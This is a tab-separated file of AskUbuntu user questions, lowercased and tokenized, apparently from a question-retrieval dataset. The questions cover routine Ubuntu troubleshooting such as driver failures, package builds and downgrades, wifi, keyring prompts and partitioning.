393101	how to build dogecoin cli wallet	i 'm trying to install dogecoin wallet , which depends on : library purpose description -- -- -- - -- -- -- - -- -- -- -- -- - libssl ssl support secure communications libdb4.8 berkeley db blockchain & wallet storage libboost boost c++ library miniupnpc upnp support optional firewall-jumping support libqrencode qrcode generation optional qrcode generation https : //github.com/dogecoin/dogecoin/blob/master/doc/build-unix.txt i was having trouble with boost , but installed libboost1.48-all-dev and now get a simpler error message : thufir @ dur : ~/dogecoin/src $ thufir @ dur : ~/dogecoin/src $ make -j2 -f makefile.unix use_upnp=- /bin/sh ../share/genbuild.sh obj/build.h g++ -c -o2 -pthread -wall -wextra -wformat -wformat-security -wno-unused-parameter -g -duse_ipv6 -dboost_spirit_threadsafe -i/home/thufir/dogecoin/src -i/home/thufir/dogecoin/src/obj -dhave_build_info -fno-stack-protector -fstack-protector-all -wstack-protector -d_fortify_source=2 -mmd -mf obj/checkpoints.d -o obj/checkpoints.o checkpoints.cpp g++ -c -o2 -pthread -wall -wextra -wformat -wformat-security -wno-unused-parameter -g -duse_ipv6 -dboost_spirit_threadsafe -i/home/thufir/dogecoin/src -i/home/thufir/dogecoin/src/obj -dhave_build_info -fno-stack-protector -fstack-protector-all -wstack-protector -d_fortify_source=2 -mmd -mf obj/netbase.d -o obj/netbase.o netbase.cpp in file included from main.h:14:0 , from checkpoints.cpp:12 : db.h:15:20 : fatal error : db_cxx.h : no such file or directory compilation terminated . make : *** [ obj/checkpoints.o ] error 1 make : *** waiting for unfinished jobs ... . thufir @ dur : ~/dogecoin/src $ i 'm not exactly sure what 's not working there . i 'll look into db_cxx.h , which , presumably , is a c file ?
393103	binary white-listed ? with usb	i was intalled ubuntu 12.04 in my asus s7765 w8 x64 with usb , when i restar my notebook apears this `` binary white-listed '' after this only show the console and the commands . please help me what i make bad ?
393104	icon size to provide for unity .desktop , and the syntax to reference it	what size icon should i provide ( and reference ) in a .desktop file for an application ? i 'm using sublime text 2 , which provides .pngs up to 256 pixels square , but by default references 48x48 in it 's .desktop file , this is fine in the sidebar/dock/thing but looks badly scaled on the alt-tab app switching view , which is larger . icon=/opt/sublime text 2/icon/48x48/sublime_text.png is there any problem if i simply reference the bigger file ? i also notice that some existing .desktop files do n't seem to reference a file , but just a name - how does that work ? ( for example chromium-browser.desktop just has the value with no path or file extension : icon=chromium-browser
393107	ubuntu 13.04 - question java and flash	i am a current online student and utilize online forums to submit post , projects , and communicate with my fellow students and advisor . my online environment requires both java and flash . i was a total bone head and instead of coming here i found a diy you tube video to install java . on a good note : the video did successful have me install something . anyway ... i need some of you gods to tell me how to remove what i previously installed and install a version of java 7 or 8 . also , i have no clue how to create print screens so i can better assist the trouble shooting ... i am sure i am forgetting to provide you guys with some information on my system ... please ask away edit : i successfully installed java 7 , but i can not access the website . an error pops up in a box named `` application blocked for security '' it says : `` failed to validate certificate . the application will not be executed name : notetext_elj , location : tychong.umuc.edu '' in osx i had to lower my security level to medium . how do i do that in ubuntu ?
393109	building/installing package with monodevelop failed , `` can not open assembly '/usr/local/lib/ ... ''	i want to build/install a mono/c # app i made on linux . i made a packaging project and added a `` tarball '' package , using a generated autotools makefile . when i build the package and try to install it with the following commands , i get errors . sudo ./configure sudo make sudo make install i get the following output : sudo make install making install in test make [ 1 ] : entering directory `/home/merlijn/dropbox/projects/phrasebookmaker/packaging/phrasebookmaker-0.1/test' mkdir -p 'bin/release' cp 'test ' 'bin/release/test' chmod +x 'bin/release/test' make [ 2 ] : entering directory `/home/merlijn/dropbox/projects/phrasebookmaker/packaging/phrasebookmaker-0.1/test' /bin/mkdir -p '/usr/local/bin' /usr/bin/install -c bin/release/test '/usr/local/bin' /bin/mkdir -p '/usr/local/lib/phrasebookmaker' make [ 2 ] : leaving directory `/home/merlijn/dropbox/projects/phrasebookmaker/packaging/phrasebookmaker-0.1/test' make [ 1 ] : leaving directory `/home/merlijn/dropbox/projects/phrasebookmaker/packaging/phrasebookmaker-0.1/test' make [ 1 ] : entering directory `/home/merlijn/dropbox/projects/phrasebookmaker/packaging/phrasebookmaker-0.1' make [ 2 ] : entering directory `/home/merlijn/dropbox/projects/phrasebookmaker/packaging/phrasebookmaker-0.1' make [ 2 ] : nothing to be done for `install-exec-am ' . make [ 2 ] : nothing to be done for `install-data-am ' . make [ 2 ] : leaving directory `/home/merlijn/dropbox/projects/phrasebookmaker/packaging/phrasebookmaker-0.1' make [ 1 ] : leaving directory `/home/merlijn/dropbox/projects/phrasebookmaker/packaging/phrasebookmaker-0.1' when i try to run the program , i get an error can not open assembly '/usr/local/lib/phrasebookmaker/phrasebookmaker.exe ' : no such file or directory . i found that the `` phrasebookmaker '' command is a script excecuting phrasebookmaker.exe with the mono runtime . the script is correctly copied to /usr/local/bin but /usr/local/lib/phrasebookmaker is empty . if i manually copy phrasebookmaker.exe to /usr/local/lib/phrasebookmaker , the application works , but as far as i know , that should be the job of the install script , no ? i have no experience with make or autotools so i have no idea what the problem could be . any suggestions ?
393110	why am i unable to load python gedit plugins ?	i am running ubuntu 12.04.03 with 3.5.0-44-generic kernel . python 2.7 and 3.2 are installed . however , whenever i try to enable gedit plugins ( python ones , like bracket completion or code comment ) i receive following error : ( gedit:12173 ) : libpeas-warning ** : could not find loader 'python3 ' for plugin 'bracketcompletion' ( gedit:12173 ) : gtk-critical ** : gtk_tree_selection_get_selected : assertion `gtk_is_tree_selection ( selection ) ' failed i have already tried to change the loader name in .plugin file from python3 to python , however it did not help . i have tried to reinstall all several times . python is working normally . it worked for me with this setup before , so i guess i screwed it by my interaction , well i am not able to find out the solution .
393114	keyring open passwords	i 've acquired an old desktop . there is no sensitive data on it , nor are there passwords on there that would matter if they get stolen . since i use it as an alarm clock it automatically logs in . at startup another program boots which has a password stored in it that it needs . i really could n't care less if that password gets stolen since you can only get my basic agenda with alerts ( there are no specifics in my basic agenda ) . the problem is that on every bootup i have to enter my password into the keyring to release this password . is it possible to make this password accessible without the keyring ? i do want to keep the keyring because of internet passwords it automatically encrypts which actually do matter .
393115	how can i change background color for the desktop ?	recently ( after updating to 13.10 ) i started experiencing this problem . i have a number of background photographs that change with 5-minute interval , set to stretch . however , the colour of the rest of the desktop , not covered by the picture , is in contrasting color . i would like to change it to black . how can i do that ?
393119	how to triforce on /b/ on ubuntu	how can you type three triangles in the shape of a triangle ? so a ascii art of the triforce from zelda using the triangle symbol . /b/ is a image board on 4chan . text on this image board is edited by an automatic system which removes all preleading spaces . this makes ascii art quite difficult to achieve . there is a trick to it using a special space char . the alt code to get this space char in windows is alt + 255 and the alt code to get the triangle in windows is alt + 30 . what are the keyboard shortcuts to get these symbols on ubuntu and how can i get them to work on 4chan ?
393120	wifi passwords in keyring	at my work we use a leap network ( you login onto the wifi using a username and password ) it is a tunneled tls network with a mschapv2 inner authentication . because of this the password in stored inside the keyring and is encrypted until i log on . the problem now rises that every time i boot my laptop at work the wifi login screen pops up when i 'm entering my password to login onto my laptop . when this screen pops up i can not enter my password to login onto my laptop and i have to click it away and finish my password . this is getting really annoying since it pops up again after about 5 seconds . i was wondering if there is a way to stop ( or at least suspend ) the attempted login onto the leap networks until the keyring is opened ?
393128	install xubuntu 13.10 on dell inspiron 15r 5537	i 'm trying to install xubuntu 13.10 on a dell 15r 5537 ( http : //www.dell.com/fr/p/inspiron-15r-5537/pd ? oc=cnr1505 & model_id=inspiron-15r-5537 ) i built a bootable usb key , but then choosing `` try without installing '' , i have the blue screen with xubuntu and the spinning ring , but after that it 's just a black screen with an underscore on the upper-left corner . then , instead of `` try without installing '' , i chose install . i did `` something else '' , i made - a swap partition - a partition for / in ext4 - a partition for my data in /usr/local and i did nothing about the existing partition for efi . the install was ok , when i reboot i can choose ubuntu in the grub options , but then i have again the blue screen with the xubuntu logo , and after again this black screen with the underscore . i can boot in console mode . but doing `` startx '' leads to an error : ( ee ) no screen found ( ee ) and other things ... after all this , i tried to boot with a live usb with ubuntu 13.04 , and here again , black screen ... any ideas would be welcome ! thanks
393131	ca n't use php extension gettext in ubuntu 13.10 ( apache2 )	i have installed the module : $ dpkg -l | grep php-gettext ii php-gettext 1.0.11-1 all and i have created the related gettext.ini file in /etc/php5/mods-available/ whit : extension=gettext.so and at the end i did to enable the module and refresh the service : sudo php5enmod gettext sudo service apache2 restart but i still to have this message on my apache log : php warning : php startup : unable to load dynamic library '/usr/lib/php5/20121212/gettext.so ' - /usr/lib/php5/20121212/gettext.so : can not open shared object file : no such file or directory in unknown on line 0 my php package is : ii php5 5.5.3+dfsg-1ubunt all
393133	is it possible to downgrade gcc 4.6.3 to 4.6.1 ?	i 'm using ubuntu 12.04.03 lts . i installed gcc 4.6.1 from tar.gz , but when i check version with gcc -- version the output version is gcc 4.6.3 . is there any way to make the version to become 4.6.1 ? thanks : )
393134	ca n't access certain web sites using ubuntu	i ca n't access certain web site like : www.last.fm when i try to load any page on this site it starts with [ connecting.. ] in the tab title and the browser shows the [ waiting for www.last.fm .. ] message on the bottom left of the page , and then the browsers stops trying to load the page because the connection is timed out . this is new problem ( i was able to access it weeks ago , but something went wrong somewhere ) . and it 's not because this web site is now blocked by my service provider , because i can access it on my mobile device and on other ( windows operated pc ) . and it is n't a web browser problem , because i ca n't access it on both firefox & chrome . is there any suggestion ? note : i 'm using ubuntu 13.10
393138	adjust new swap memory	currently , my system have 2 gb swap memory , in the following structure- /dev/sda1 -- linux-swap -- /dev/sda2 -- ext4 -- system installation unallocated -- unallocated -- now i want to increase the swap memory . i have very poor knowledge in ubuntu . i 'm trying to add more swap memory in following way- /dev/sda1 -- linux-swap -- /dev/sda2 -- ext4 -- system installation new partition # 1 -- linux-swap -- unallocated -- unallocated -- will it work as swap memory for my system ? is there any way to merge both the swap memory into one , like in windows minipartionwizard partion do restructure without loosing any data . thanks in advance !
393139	x does not start after 17 dec update of nvidia	i am running 12.04 with 3.2.0-57-generic-pae kernel on a lenovo w520 that has a nvidia card in it . i updated yesterday , ( 17 , december , 2013 ) , and the update included the following two nvidia updates : nvidia-current-updates : i386 ( 304.88-0ubuntu0.0.3 , 304.108-0ubuntu0.0.1 ) nvidia-304-updates : i386 ( 304.88-0ubuntu0.0.3 , 304.108-0ubuntu0.0.1 ) the error message i see is the same as someone else posted on another forum : [ 29.393 ] ( ii ) nvidia ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 29.393 ] ( == ) nvidia ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 29.393 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 29.393 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 29.393 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 29.393 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 29.402 ] ( ee ) nvidia ( 0 ) : failed to initialize the nvidia kernel module . please see the [ 29.402 ] ( ee ) nvidia ( 0 ) : system 's kernel log for additional error messages and [ 29.402 ] ( ee ) nvidia ( 0 ) : consult the nvidia readme for details . [ 29.402 ] ( ee ) nvidia ( 0 ) : *** aborting *** [ 29.402 ] ( ee ) nvidia ( 0 ) : failing initialization of x screen 0 [ 29.402 ] ( ii ) unloadmodule : `` nvidia '' the answer given to them was to run the nvidia-config program and then restart the system . i do not have an nvidia-config utility on my system . my question is how do i either back out these updates which caused the problem , is there another update currently available somewhere that will fix the problem , where can i get the nvidia-config utility to hopefully correct the problem , or what can i do to get back to where i can use the system with x functional ?
393145	wifi adapter not working on thinkpad t42 with 12.04.3	i have a weird issue that i hope someone can help with . i have just installed ubuntu onto an old thinkpad t42 . the only disk that i had available was 11.10 and during the install i selected the wifi adapter as the main network interface to continue the install ; i happily added my ssid and wpa-psk and the install completed successfully . at this point i had physically moved location and had access to a cabled connection , was prompted the 11.10 was outdated and to upgrade to 12.04.3 . the upgrade went through well but afterwards the internal wifi would not work . i have a plug in usb wifi adapter which happily connects . from all of the above i can work out : not a problems with network and other workstations connect . not a problem with ssid/wpa2-psk or network manager as usb adapter works . if this helps : nbatchelor @ ubuntu-laptop-nb : ~ $ lshw -c network warning : you should run this program as super-user . *-network:0 description : ethernet interface product : 82540ep gigabit ethernet controller ( mobile ) vendor : intel corporation physical id : 1 bus info : pci @ 0000:02:01.0 logical name : eth0 version : 03 serial : 00:01:6c : e9 : ce:94 capacity : 1gbit/s width : 32 bits clock : 66mhz capabilities : bus_master cap_list rom ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e1000 driverversion=7.3.21-k8-napi firmware=n/a latency=64 mingnt=255 multicast=yes port=twisted pair resources : irq:11 memory : c0240000-c025ffff memory : c0200000-c020ffff ioport:8000 ( size=64 ) memory : e8000000-e800ffff *-network:1 description : wireless interface product : ar5212/ar5213 wireless network adapter vendor : qualcomm atheros physical id : 2 bus info : pci @ 0000:02:02.0 logical name : wlan0 version : 01 serial : 00:14 : a4:50:48:6e width : 32 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath5k driverversion=3.2.0-57-generic firmware=n/a ip=192.168.1.88 latency=168 maxlatency=28 mingnt=10 multicast=yes wireless=ieee 802.11bg resources : irq:11 memory : c0210000-c021ffff *-network description : wireless interface physical id : 1 bus info : usb @ 1:4 logical name : wlan1 serial : 00:14:7c:67:3a:54 capabilities : ethernet physical wireless configuration : broadcast=yes driver=zd1211rw driverversion=3.2.0-57-generic firmware=4605 ip=192.168.1.84 multicast=yes wireless=ieee 802.11bg warning : output may be incomplete or inaccurate , you should run this program as super-user . at this point i am lost and any ideas to move forward are much appreciated . update i have alos posted on g+ here : https : //plus.google.com/110658879107549841273/posts/ypyqbhw9pbt i was advised to run : sudo apt-get install rfkill & & rfkill unblock all i then installed `` hardinfo '' which is showing the connection as live and passing data but the network manager is not showing the connection and has an empty wifi symbol
393151	add x-robots-tag to apache config	i need to fix my server with the robots tags headers , x-robots-tag is there an easy way to add this in apache httpd.conf ?
393152	xp & ubuntu out of order	libertie @ lodewijk.de wrote : i have windows xp running . i installed ubuntu 13.10 on a ext hard disk . after installation restarting ... and nothing works anymore . ubuntu from the live dvd or from the ext disk asks for reconfiguration of the graphics and stops . removing the ext disk and trying windows also blocks on : grub rescue . how can i go on ( in windows or in ubuntu ) ? please help thanks
393156	does a fresh install of ubuntu on an ssd need tweaking ( to enable trim , etc . ) ?	i 've heard that ubuntu needs some tweaking for optimal performance when migrating an existing install to an ssd . however , i have made a fresh install after switching to the ssd , so perhaps the installer has detected that it 's an ssd and put the best defaults ? or does it still need tweaking ?
393160	how can i leave tty ?	so i got a problem here . so i installed sdl 2.0.1 , everything worked fine , i installed dependencies of sdl as well , so i saw that it did n't worked , so i rebooted my pc , after that i get to gnome , and do n't know what do , maybe some help ? : )
393161	adding parameter to default browser	i can run browser from dash with added parameters ( like google-chrome -- single-process -- purge-memory-button ) without problem , by editing of .desktop file , but how i could reach the same by running of default browser via triggering open url event ? there is no options applied in this case . for example if i have document in libreoffice with url , after click on it , new instance of browser appear , but no parameters are applied to . how i can change those ?
393162	is it possible to have portable lubuntu drive able to install packages ?	i have an old eee 901 company laptop and would like to use lubuntu on it . however i do not want to change bootloader on anything including the default win xp installation on the machine . i have no problem to create live flash disk ( or sdhc card ) using unetbootin but as i know it is not possible to install anything there - just only keeps some user settings ... is there any way how to solve it ? it is possible to install grub on the sd card so it would work for lubuntu while card inserted and leave the windows bootloader on the built-in drive ? thanks
393163	ubuntu uninstall : what partitions shall i delete ?	so , i wan na uninstall ubuntu and i do n't know what partitions i can safely delete . i have assigned 100gb to ubuntu and installed skype , openjdk , minecraft and that 's all .
393169	how to get back from tty to unity	i got a problem . i installed sdl , rebooted pc , and got to gnome-terminal or in other name it 's tty i guess so . i tried to reboot again , but i get the same screen . could someone help me how to get out of tty and get back to unity ( desktop ) ?
393175	how can i develop for ubuntu touch on windows ?	i am working in a windows environment and need to develop applications in ubuntu . what is the best approach ?
393176	install gnome without apt-get	i have a server which is not connected ( nor do i want to connect it ) to my network . i am trying to find out how i can install gnome without using apt-get , however i can not find the files for gnome anywhere . i have googled and researched this , but i still have not had any luck finding the answer . does anyone have an idea how to do this ? its ubuntu 13.10 server x64 .
393177	network-manager buggy in 13.10 - no hardware found	i installed ubuntu 13.10 on my aspire 4810t parallel to windows 7 . i 'd like to test ubuntu and remove windows forever . but i have a problem with my network-manager . in any case it tells me , that there is no hardware available . i have ethernet ( atheros 8131 gigabit ethernet ) and wifi ( intel wifi link 5100 ) available and it works in windows ! ! furthermore the network-manager is re-starting a dozen times a minute ( process-number changes from one second to another ) . i already checked out some reports similar to this : networkmanager broken after upgrade to kubuntu saucy nothing works ! actually , it is the third time it works - i mean the network-manager runs correctly and i have internet access . but usually it takes me 5-6 hours a day to make it works ... and i ca n't repeat it . next time : same steps - another result . anybody have an idea , what the hell is going wrong ? ? greets
393180	ubuntu 12.04 can not start , `` saned disabled ; edit /etc/default/saned ''	hi . i 'm new to ubuntu and i can not speak english very well . i installed ubuntu 12.04 lts and it worked very well . but now it can not start . i only see the logo an then just this text : fsck de util-linux 2.20.1 /dev/sda7 : clean , 217248/1490944 files , 1307260/5959424 blocks skipping profile in /etc/apparmor.d/disable : usr.bin.firefox skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd *starting apparmor profiles [ ok ] speech-dispatcher disabled ; edit /etc/default/speech-dispatcher saned disabled ; edit /etc/default/saned please , does anyone have any idea what happened or know what i can do ? many thanks from argentina .
393181	hot to unistall jdownloader 2 beta ?	i want to uninstall jdownloader 2 beta , having taken the steps in this webpage : http : //ubuntuhandbook.org/index.php/tag/13-04/ . apparently , it is a sort of installation with `` .sh '' files . what i have figured out is that the regular `` jdownloader '' can be removed writing commands such as : sudo apt-get purge jdownloader and so forth . however , i have been trying the same way with `` jdownloader 2 beta '' but it does not work out .
393185	can i use the normal usb installation of ubuntu 12.04.3 on my mac mini 10.6.8 ?	do i just use the instructions as they are ? do i need to do things a little differently ? i just want to make sure to prevent the screwing up of my mac . thanks !
393187	conky not displaying image	conky is not displaying my image own_window yes own_window_class conky own_window_transparent yes own_window_hints undecorate , below , sticky , skip_taskbar , skip_pager own_window_argb_visual yes own_window_argb_value 200 double_buffer yes text $ { image ~/.bp_line.png -s 762x373 } i have tried a few different things to get conky to display this image , by itself , adding the code to an other conky skin . nothing i try gets the image to display .
393188	ca n't fix getting out of suspend for nvidia even with the official steps	even after doing the steps from ubuntu for fixing the going out of suspend problem with nvidia cards , i still can make it work . when i wake up from suspend i get just black screen with blinking cursor and that 's it . below i 'm pasting the steps i followed : suspend/hibernation if you use an old nvidia driver , hibernation & suspend may not work , there is a workaround however . we need to edit xorg.conf , open a terminal and enter the following command : gksudo gedit /etc/x11/xorg.conf in the section called section `` device '' add option `` nvagp '' `` 1 '' , you should end up with something like this : section `` device '' identifier `` my id '' driver `` my dr '' vendorname `` my vendor '' boardname `` my board name '' option `` nvagp '' `` 1 '' endsection blacklist the intel_agp module from being loaded by the kernel . this is done by editing blacklist.conf , open a terminal and type : gksudo gedit /etc/modprobe.d/blacklist.conf then add the following line : blacklist intel_agp reboot your system .
393190	no gui on lenovo with nvidia	i updated my ubuntu with the normal update on december 17th , and now i have no gui display . it is an lenovo 4314-9vg s/n r9-69 pe7 10/08 , with 3.2.0-57-generic-pae kernel have tried to make sudo apt-get ... install different nvidia things . first i tried to reestablish xorg.conf with nvidia-xconfig . nothing has so far helped . the first line in the xorg.conf says version 304.108 buildmeister @ swio-display-x64-rhel04-07 )
393192	can not downgrade subversion without a lot of work	i 'm trying to track a bug in svn . i need to be able to switch between svn 1.7.x and 1.8.x to try tests . i am using wandisco 's packages . /etc/issue ubuntu 12.10 \n \l /etc/apt/source.list.d/wandisco.list # wandisco open source repo deb http : //opensource.wandisco.com/ubuntu precise svn18 deb http : //opensource.wandisco.com/ubuntu precise svn17 i realise i am running quantal but precise is listed . this works for me ( tm ) as wandisco does n't have quantal-specific packages . when i have subversion=1.7.14-1+wandisco installed i can sudo apt-get install subversion sudo apt-get install subversion=1.8.5-1+wandisco and either brings me up to subversion 1.8.5-1+wandisco no problem . going in the other direction is a major operation . after much trial and error , here 's what i 've discovered/concluded is a minimal working method for me : sudo apt-get autoremove subversion sudo apt-get clean sudo vim /etc/apt/sources.list.d/wandisco.list # deb http : //opensource.wandisco.com/ubuntu precise svn18 sudo apt-get install subversion as i understand this , i have to completely remove svn 1.8.5 and its dependencies ( libsvn1 ) , remove the svn 1.8.5 cached packages and remove apt-get 's knowledge that svn 1.8.x is even available . only then will it deign to install 1.7.14 . my question is , when 1.8.5 is installed , why does n't this sudo apt-get install subversion=1.7.14-1+wandisco work ? what i get is user @ user-virtualbox : /etc/apt/sources.list.d $ sudo apt-get install subversion=1.7.14-1+wandisco reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : subversion : depends : libsvn1 ( = 1.7.14-1+wandisco ) but 1.8.5-1+wandisco is to be installed e : unable to correct problems , you have held broken packages . user @ user-virtualbox : /etc/apt/sources.list.d $ i get the `` is to be installed '' unless i follow exactly all three steps above : autoremove , clean , comment out the package line . i noticed that wandisco 's install script creates sources.list.d/wandisco-svn1 [ 78 ] so i tried using the two files instead of the one ; the thinking being that perhaps line ordering in wandisco.list was creating a priority order . that failed to downgrade in the same way . it seems that if apt-get has any knowledge that 1.8.5 exists , it will prefer that over 1.7.14 . if there 's an easier way , i 'd really like to know .
393193	where should i put my photos so that they are visible in unity 's photo lens ?	i have many pictures but for instance put in ~/dropbox/photos and they are not detected by unity 's photo lens . i have even tried putting some of them in ~/pictures but still no pictures in the lens . additionally is there any possibility to change the directory with the photos that the lens would read the photos from ?
393195	how to change month name to english ?	my calender screenshot : how i can change to english day names or other things ?
393198	ca n't delete file ( folder ? )	i run ubuntu as a dual boot along with windows and last time i was on ubuntu , i created a folder ( java ) in the following directory . this time , when i logged on , i was unable to navigate into the folder , and in nautilus the folder appears with the image of binary . i do n't really mind losing the data that was in the folder , so i 'm just trying to delete it so i can make a new one . however , each time i try deleting , moving , or performing any other operation on the 'folder ' it gives me a message like in the following : user @ user : /media/user/data/personal/program $ ls -l total 788888 drwxrwxrwx 1 root root 0 aug 17 19:30 github -rwxrwxrwx 2 root root 269367 dec 19 01:30 java drwxrwxrwx 1 root root 4096 may 14 2013 learning -rwxrwxrwx 2 root root 17929538 aug 11 2012 mediawiki-1.19.1.tar.gz -rwxrwxrwx 1 root root 5810 nov 30 23:55 mtee.zip drwxrwxrwx 1 root root 4096 sep 30 23:41 projects -rwxrwxrwx 1 root root 0 dec 19 15:15 text-1.txt -rwxrwxrwx 1 root root 782 may 23 2012 toruby.lnk -rwxrwxrwx 2 root root 789884928 mar 16 2013 ubuntu-12.10-desktop-i386.iso drwxrwxrwx 1 root root 0 mar 3 2013 utility -rwxrwxrwx 2 root root 5435945 jul 31 19:20 wordpress-3.5.2.zip user @ user : /media/user/data/personal/program $ rm java rm : can not remove âjavaâ : no such file or directory user @ user : /media/user/data/personal/program $ edit : when i try to do any operations on 'java ' in nautilus , i get a `` error removing file : no such file or directory '' message as well . edit2 : i attempted to delete using srm , and received a new error : `` error : file java - file is hardlinked 1 time ( s ) , skipping ! '' edit 3 : i found the second hardlink was in my itunes library file . resolved : i ended up trying to create a new folder in windows and had absolutely no problems . rebooted in ubuntu and everything is hunky dory
393199	how to change saved image colors with evince	i am using evince as my default pdf viewer because it has a feature to save an individual page as an image ( jpeg ) ( r-click > save image as ... ) . it works great as long as the .pdf file is black on white background . however , most of my .pdf files are of digitized books that are black on a light tan background . these pages always save an image that is white on black . i have tried inverting the colors ( ctrl-i ) but that has no effect on the saved image . how do i save an image in evince so that it is always black on a white background ? or keep the original colors ?
393200	how to make ubuntu see my raid1 setup ?	i have raid1 setup that i was using in windows . now i want to see it under ubuntu . under disks > devices i see the 2 x 500gb hard disks as sdb and sdc ( on sda is ubuntu ) and contents says `` intel matrix raid member '' for both of them also there is another device under `` other devices '' that 's called 500gb block device and is /dev/dm-1 so how do i mount/see that so i can use it in the file manager ?
393205	kubuntu wo n't log in , stuck on login splash screen	i am running kubuntu 13.10 . out of the blue , i am now unable to log in . i rebooted , ( only changed the desktop background , did n't update any packages or anything ) and was taken to the login splash screen as usual because i have automatic login enabled . however , the loading bar i set as the splash is stuck on this : http : //i.imgur.com/pus2gsw.jpg ( sorry , all i 've got is this ipod . ) i tried restarting lightdm , and rebooting too , but those did nothing ... it would n't be the graphics drivers , since i did n't mess around with them ... how would i remedy this and get to a desktop ?
393212	is it safe to use the command apt-get autoremove in this particular scenario ?	since the last time i used sudo apt-get autoremove , nearly every important display driver or parts got deleted . this made me very squeamish in using the command again . however , each time i install something or use apt-get update the terminal reads : the following packages were automatically installed and are no longer required : devilspie libturbojpeg : i386 libxrandr-ltsr2 language-pack-kde-en kde-l10n-engb language-pack-kde-en-base libxv1 : i386 libllvm3.2 libllvm3.2 : i386 linux-generic-lts-raring use 'apt-get autoremove ' to remove them . i tried the command clean and the messages stops displaying for a while . my question would be if it 's safe running the autoremove command , or will i loose everything once again . is there a way of checking how safe it is to use autoremove in this particular ( or any ) case ?
393216	how to setup an access point for two wireless networks of which one ends on a vpn ?	i currently have an ubuntu machine , which i 'd like to use as a access point/proxy server . now , due to the requirements i have , it 's going to be a fairly complex ( for a beginner ... ) setup . the machine is connected to the internet , and it has a wireless card . the end result is that should act as router ( access point ) for two separate wireless networks . one network would connect directly to internet , the other instead should connect to a vpn . i do n't know if this is typical or not , but essentially i want all the trusted users to be able to connect to a wireless which goes directly to the internet , while the untrusted ones connect to the internet through a vpn , behind the scenes . can anybody give me an overview of the concepts involved , and where can i start studying for setting it up ? the vpn setup should be an openvpn one .
393217	what is the difference between cinnamon and cinnamon ( software rendering ) when choosing a desktop enviornment before logging in ?	okay , what is the difference between cinnamon and cinnamon ( software rendering ) when choosing a desktop environment for ubuntu ? sub question : what is the difference between linux mint with cinnamon vs ubuntu running with the cinnamon desktop environment ?
393222	problem to install easycam	i had problem when i install the easy cam vitor @ vitor-hp : ~ $ gksudo 'python /usr/share/easycam2/core.py -- gtk' vitor @ vitor-hp : ~ $ kdesudo 'python /usr/share/easycam2/core.py -- qt' python : ca n't open file '/usr/share/easycam2/core.py ' : [ errno 2 ] no such file or directory according the documentation i done all the steps .
393226	software centre authentication error 13.10	so i 'm very new to ubuntu , i do n't know how to edit files , everything i do to improve ubuntu is done through the terminal using guides i find online . basically since i downloaded ubuntu 13.10 overtop of my windows 8 , i 've regretted it . mainly because most of the things arnt working , gnome-terminal , software centre , etc . currently i 've done all the things any guide online says to try and fix my software centre , i 've viewed guides on askubuntu , wikihow , etc etc . none of them worked/work and now i 'm getting tired of it . everytime i try to remove/install a program in the software centre , i receive this error : authentication error software ca n't be installed or removed because the authentication service is not available . ( org.freedesktop.policykit.error.failed : ( 'system-bus-name ' , { 'name ' : ':1.49 ' } ) : org.debian.apt.install-or-remove-packages if you could please help me fix this , so that i could move on with ubuntu , it 'd be greatly appreciated . when explaining things to me , please be very elaborate - i 'm very new to ubuntu .
393230	how to install printer hp deskjet 3524 ?	i have an ubuntu 12.04 and want to setup my hp deskjet 3524 all in one printer . how can i install this printer ?
393231	need help with dual-boot wont let me go back to windows	i 'm using ubuntu 12.04 lts want to go back to windows 8.1 when i try to go back it says unknown command 'drivemap ' . error efi file path just installed it an hour ago didnt even mess with settings please help
393232	changing device with v4l2-ctl is not working	i have a wintv hvr 1900 tv tuner runnning on ubuntu 13.10 , from which i would like to capture s-video input . the device is supported , based on linuxtv . as is written here , it seems that that kind of device defaults to the tuner input , and that a change of input is therefore needed . this is also supported by the fact that trying to read the output stream with vlc using terminal command cat /dev/video1 > test.mpg and opening the resulting file does succeed in opening the stream , but since there is no signal i see only a black screen . i am quite sure that my system handles the device correctly , and /dev/video1 does indeed exist ( my integrated webcam holds the video0 slot ) . my problem is that trying to change devices through terminal command v4l2-ctl -d 1 as exposed here yields no error , but seems to do nothing . can anyone please help me here ? terminal session : raoul @ raoul-easynote-ls11hr : ~ $ v4l2-ctl -i video input : 0 ( camera 1 : ok ) raoul @ raoul-easynote-ls11hr : ~ $ v4l2-ctl -d 1 raoul @ raoul-easynote-ls11hr : ~ $ v4l2-ctl -i video input : 0 ( camera 1 : ok ) raoul @ raoul-easynote-ls11hr : ~ $ v4l2-ctl -n ioctl : vidioc_enuminput input : 0 name : camera 1 type : 0x00000002 audioset : 0x00000000 tuner : 0x00000000 standard : 0x0000000000000000 ( ) status : 0x00000000 ( ok ) capabilities : 0x00000000 ( not defined ) raoul @ raoul-easynote-ls11hr : ~ $ v4l2-ctl -- info driver info ( not using libv4l2 ) : driver name : uvcvideo card type : 1.3m hd webcam bus info : usb-0000:00:1a.0-1.3 driver version : 3.11.7 capabilities : 0x84000001 video capture streaming device capabilities device caps : 0x04000001 video capture streaming raoul @ raoul-easynote-ls11hr : ~ $
393233	screen flicker after installing 13.10	i have just installed 13.10 on my desktop . now the screen will flicker with a double image when i scroll up or down using the mouse and occasionally when i am typing ( like now ! ! ! ) . when nothing is changing on the screen it is stable most of the time .
393234	turn off audio loopback from microphone	i just set up my machine and plugged in my headset , but now i 'm currently wondering how to disable the audio loopback from my microphone . i 've found nearly the same question over here how do i turn off audio echo from microphone to local speakers ? but my interface looks different , and there are a hell lot of entries if run pacmd list so i 'm not sure wich one to pick .
